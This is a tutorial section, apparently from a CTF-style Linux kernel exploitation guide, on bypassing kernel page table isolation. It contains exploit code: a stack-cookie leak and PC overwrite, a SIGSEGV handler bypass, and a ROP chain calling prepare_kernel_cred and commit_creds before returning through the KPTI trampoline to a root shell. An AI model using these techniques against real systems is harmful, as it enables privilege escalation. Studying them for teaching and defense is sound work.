Kernel page table isolation (KPTI)

Kernel page table isolation (KPTI) is a countermeasure against attacks such as Meltdown, which exploit the kernel and userspace sharing a single set of page tables.

With KPTI there is one set of page tables for userspace and a separate set for kernel space. Whenever execution enters or leaves kernel mode, the active page tables are swapped between the two sets.
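On a running system, one way to confirm that KPTI is active is to read the Meltdown entry that Linux exposes under sysfs, which reports `Mitigation: PTI` when page table isolation is on. The following is a minimal sketch, assuming sysfs is mounted at /sys in the target environment (a stripped-down CTF initramfs may not mount it). The helper names `status_reports_pti` and `read_meltdown_status` are hypothetical and not part of the original exploit.

```c
#include <stdio.h>
#include <string.h>

/* Assumes sysfs is mounted at /sys in the target environment. */
#define MELTDOWN_STATUS "/sys/devices/system/cpu/vulnerabilities/meltdown"

/* Returns 1 if a status line says page table isolation is in use. */
static int status_reports_pti(const char *status)
{
  return strstr(status, "Mitigation: PTI") != NULL;
}

/* Reads the first line of the sysfs entry into out; returns 0 on success. */
static int read_meltdown_status(char *out, size_t len)
{
  FILE *f = fopen(MELTDOWN_STATUS, "r");

  if (!f)
    return -1;
  if (!fgets(out, (int)len, f)) {
    fclose(f);
    return -1;
  }
  fclose(f);
  return 0;
}
```

Passing the line read by `read_meltdown_status` to `status_reports_pti` before running the exploit tells you whether the return to userspace is likely to need one of the techniques described in this section.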

Because KPTI is a protection against Meltdown-style attacks rather than memory corruption, our buffer overflow exploit doesn't need much added to it to overcome this mitigation.

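Annoyingly, all it does is send a segfault to our process when our kernel_rop exploit returns from kernel space into userspace. The crash happens because the ROP chain returns to userspace while the kernel page tables are still active, and in those tables userspace pages are not executable.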

The ./launch_SMEP_KPTI.sh script launches the example kernel with KPTI enabled, and running our existing exploit results in a segfault.

There are two main techniques for overcoming this mitigation:

Signal Handler

Since our process is being sent a segfault, we can register a signal handler to handle that segfault and call our drop_shell function.

Our exploit's main function will look something like:

int main(void) {
  /*
   * Interacting with this kernel module is easy
   * just treat it like a file
   */

  int fd;
  unsigned long stack_cookie;

  fd = open(KERN_MODULE, O_RDWR);
  if (fd < 0)
    exit_and_log("Failed to open kernel module\n");

  /*
   * Just like a userspace buffer overflow, a stack
   * read will give us the stack cookie that we can
   * use when doing our kernel space overflow
   */
  stack_cookie = do_leak(fd);

  /*
   * Get prepare_kernel_cred and commit_creds using
   * /proc/kallsyms
   */
  get_kernel_addresses();

  /*
   * Get registers that we'll need to restore later
   */
  save_state();

  /*
   * KPTI will issue a SEGFAULT when returning to userspace
   * So we can simply register a signal handler to catch
   * this signal and run the drop_shell function instead
   */ 
  signal(SIGSEGV, drop_shell);

  /*
   * Overwrite the program counter and execute our
   * shellcode!
   */
  overwrite_pc(fd, stack_cookie, kernel_base);

  printf("At end of main\n");

  close(fd);
}

This simple addition should work in most CTF cases, and we can run our original exploit again and see it work.
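The signal(2) man page notes that the behaviour of signal() varies across systems and recommends sigaction() instead. A minimal sketch of registering the handler that way is shown here. The names `install_segv_handler`, `on_segv` and `segv_seen` are hypothetical stand-ins; in the exploit the handler passed in would be drop_shell, assuming it has the `void (int)` signature that signal handlers require.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <string.h>

/* Flag set by the demo handler so the caller can see that it ran. */
static volatile sig_atomic_t segv_seen = 0;

/* Stand-in for drop_shell: only records that SIGSEGV was delivered. */
static void on_segv(int signo)
{
  (void)signo;
  segv_seen = 1;
}

/* Registers handler for SIGSEGV; returns 0 on success, -1 on failure. */
static int install_segv_handler(void (*handler)(int))
{
  struct sigaction sa;

  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = handler;
  sigemptyset(&sa.sa_mask);
  return sigaction(SIGSEGV, &sa, NULL);
}
```

In main, `install_segv_handler(drop_shell)` would take the place of the `signal(SIGSEGV, drop_shell)` call.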

KPTI trampoline

The idea behind this technique is to use the kernel's own method of switching between the userspace and kernel space page tables, so that our exploit transitions gracefully to our drop_shell function.

The function swapgs_restore_regs_and_return_to_usermode is used to switch between these two sets of page tables, and with an appropriate leak we can reuse it in our ROP chain.

The relevant part of this function's source (arch/x86/entry/entry_64.S in the kernel tree) is:

POP_REGS pop_rdi=0

/*
 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
 * Save old stack pointer and switch to trampoline stack.
 */
movq	%rsp, %rdi
movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
UNWIND_HINT_EMPTY

/* Copy the IRET frame to the trampoline stack. */
pushq	6*8(%rdi)	/* SS */
pushq	5*8(%rdi)	/* RSP */
pushq	4*8(%rdi)	/* EFLAGS */
pushq	3*8(%rdi)	/* CS */
pushq	2*8(%rdi)	/* RIP */

/* Push user RDI on the trampoline stack. */
pushq	(%rdi)

/*
 * We are on the trampoline stack.  All regs except RDI are live.
 * We can do future final exit work right here.
 */
STACKLEAK_ERASE_NOCLOBBER

SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

/* Restore RDI. */
popq	%rdi
SWAPGS
INTERRUPT_RETURN

You can use the whole function, but you would then need a dummy value on the stack for every register that the POP_REGS macro pops.

Instead, since we control the program counter, we usually jump into the middle of this function, at the first mov instruction (just after POP_REGS), so that execution falls through the page table switch to the swapgs and iretq instructions.
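As a rough sketch of how the jump target could be computed, the address of swapgs_restore_regs_and_return_to_usermode can be looked up in /proc/kallsyms (the same source used for prepare_kernel_cred and commit_creds) and a build-specific offset added to land on the first mov. The helper names and the `TRAMPOLINE_SKIP` value below are assumptions for illustration; the real offset has to be read from a disassembly of the target kernel.

```c
#include <stdio.h>
#include <string.h>

#define TRAMPOLINE_SYM "swapgs_restore_regs_and_return_to_usermode"

/*
 * ASSUMPTION: number of bytes from the start of the function to its
 * first mov instruction. This depends on the kernel build.
 */
#define TRAMPOLINE_SKIP 22UL

/* Parses one "address type name" line; returns 1 if name == symbol. */
static int parse_kallsyms_line(const char *line, const char *symbol,
                               unsigned long *addr)
{
  unsigned long value;
  char type;
  char name[128];

  if (sscanf(line, "%lx %c %127s", &value, &type, name) != 3)
    return 0;
  if (strcmp(name, symbol) != 0)
    return 0;
  *addr = value;
  return 1;
}

/* Returns the jump target, or 0 if the symbol is missing or hidden. */
static unsigned long find_kpti_trampoline(void)
{
  FILE *f = fopen("/proc/kallsyms", "r");
  char line[256];
  unsigned long addr = 0;

  if (!f)
    return 0;
  while (fgets(line, sizeof(line), f)) {
    if (parse_kallsyms_line(line, TRAMPOLINE_SYM, &addr)) {
      /* Addresses read as 0 when the kernel hides them from us. */
      if (addr != 0)
        addr += TRAMPOLINE_SKIP;
      break;
    }
  }
  fclose(f);
  return addr;
}
```

The value returned by `find_kpti_trampoline` is what the ROP chain would use as kpti_trampoline.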

So instead of registering a signal handler, we simply add a gadget at the end of our ROP chain pointing to the KPTI trampoline, followed by some dummy values for the extra pop instructions and then the frame that iretq restores:

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;  // rbx
  buf[cookie_offset + 2] = 0x4141414141414242;  // rdx
  buf[cookie_offset + 3] = pop_rdi_ret;
  buf[cookie_offset + 4] = 0;                   // argument for prepare_kernel_cred
  buf[cookie_offset + 5] = prepare_kernel_cred;
  buf[cookie_offset + 6] = mov_rax_rdi;         // move cred struct to argument
  buf[cookie_offset + 7] = commit_creds;
  buf[cookie_offset + 8] = kpti_trampoline;
  buf[cookie_offset + 9] = 0x0;                 // dummy rax
  buf[cookie_offset + 10] = 0x0;                // dummy rdi
  buf[cookie_offset + 11] = user_rip;           // drop_shell function
  buf[cookie_offset + 12] = user_cs;
  buf[cookie_offset + 13] = user_rflags;
  buf[cookie_offset + 14] = user_sp;
  buf[cookie_offset + 15] = user_ss;
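The tail of this chain (trampoline address, two dummy slots, then RIP, CS, RFLAGS, RSP and SS) always has the same shape, so it can be factored into a small helper. This is only a sketch: `struct user_state` and `append_kpti_return` are hypothetical names, and the two dummy slots match the layout used above, which may differ on other kernel builds.

```c
#include <stddef.h>

/* Userspace register values saved before triggering the overflow. */
struct user_state {
  unsigned long rip;    /* where to resume, e.g. drop_shell */
  unsigned long cs;
  unsigned long rflags;
  unsigned long sp;
  unsigned long ss;
};

/*
 * Writes the trampoline gadget, two dummy values and the iretq frame
 * into buf starting at index off. Returns the index after the last
 * slot written. The caller must make sure buf has room for 8 slots.
 */
static size_t append_kpti_return(unsigned long *buf, size_t off,
                                 unsigned long trampoline,
                                 const struct user_state *st)
{
  buf[off++] = trampoline;
  buf[off++] = 0;          /* dummy value for the first extra pop */
  buf[off++] = 0;          /* dummy value for the second extra pop */
  buf[off++] = st->rip;
  buf[off++] = st->cs;
  buf[off++] = st->rflags;
  buf[off++] = st->sp;
  buf[off++] = st->ss;
  return off;
}
```

With this helper, the last eight assignments above would become a single call such as `append_kpti_return(buf, cookie_offset + 8, kpti_trampoline, &st)`, where `st` holds the values captured by save_state.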
